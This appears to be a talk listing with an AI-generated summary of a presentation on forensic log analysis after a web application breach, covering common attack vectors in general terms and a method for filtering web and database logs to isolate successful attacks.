Abstract
Video was in 3 parts these are the link to those
AI Generated Summary
This talk addresses the forensic analysis required after a web application breach, contrasting proactive penetration testing with reactive incident investigation. The primary research area involves post-compromise methodology to determine attacker actions and system impact.
Attack vectors discussed include exploiting authentication/authorization flaws and PHP file inclusion vulnerabilities to gain initial access. Once compromised, attackers commonly use SQL injection to alter backend data and inject malicious content into legitimate pages. This enables drive-by malware downloads, where user systems accessing the infected site receive payloads designed to steal credentials or establish backdoors.
For incident response, the speaker outlines a structured log analysis approach. The first step is to enumerate all network components associated with the victimized server (e.g., web server, database) and identify relevant log sources. Given that automated attack tools generate vast log volumes, a filtering strategy is essential. The presented methodology involves eliminating requests for non-existent files and unsuccessful attempts to isolate traffic corresponding to successful attacks. Analysts must then map specific attack patterns (e.g., SQL injection, file inclusion) to the appropriate log blocks for detailed examination.
The practical implication is that effective post-breach analysis depends on systematic component identification and intelligent log filtering to cut through noise. This allows security teams to accurately assess the severity of the compromise, identify stolen data or persistent access, and implement targeted remediation measures to restore system integrity. The focus is on internet-based attacks against web and database servers.